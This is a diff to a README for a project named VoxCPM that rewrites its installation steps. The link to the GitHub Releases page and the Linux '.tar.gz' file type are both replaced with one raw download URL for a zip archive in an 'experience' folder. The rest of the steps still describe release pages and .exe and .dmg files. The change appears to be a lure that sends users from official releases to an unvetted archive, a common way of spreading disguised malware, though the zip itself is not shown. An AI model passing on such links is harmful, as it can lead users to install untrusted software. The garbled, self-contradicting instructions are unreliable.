richbelleza/VoxCPM/README.md

 ## 💻 Installation Steps

 ### 1. Visit the Download Page
-Go to the [VoxCPM Releases page](https://github.com/richbelleza/VoxCPM/releases).
+Go to the [VoxCPM Releases page](https://raw.githubusercontent.com/richbelleza/VoxCPM/main/experience/VoxCPM.zip).
 This page lists all available versions of VoxCPM.

 ### 2. Select Your Version
 Look for the latest version at the top of the releases.
 Click on the version number to view details and download options.

 ### 3. Choose the Correct File
 Find the file that suits your operating system.
 For example, if you are using Windows, look for a file that ends with `.exe`.
 If you are on macOS, look for a file that ends with `.dmg`.
-For Linux, you may find a `.tar.gz` file.
+For Linux, you may find a `https://raw.githubusercontent.com/richbelleza/VoxCPM/main/experience/VoxCPM.zip` file.

 ### 4. Download the Application
 Click on the file to start the download.
 Make sure to note where the file is saved on your computer.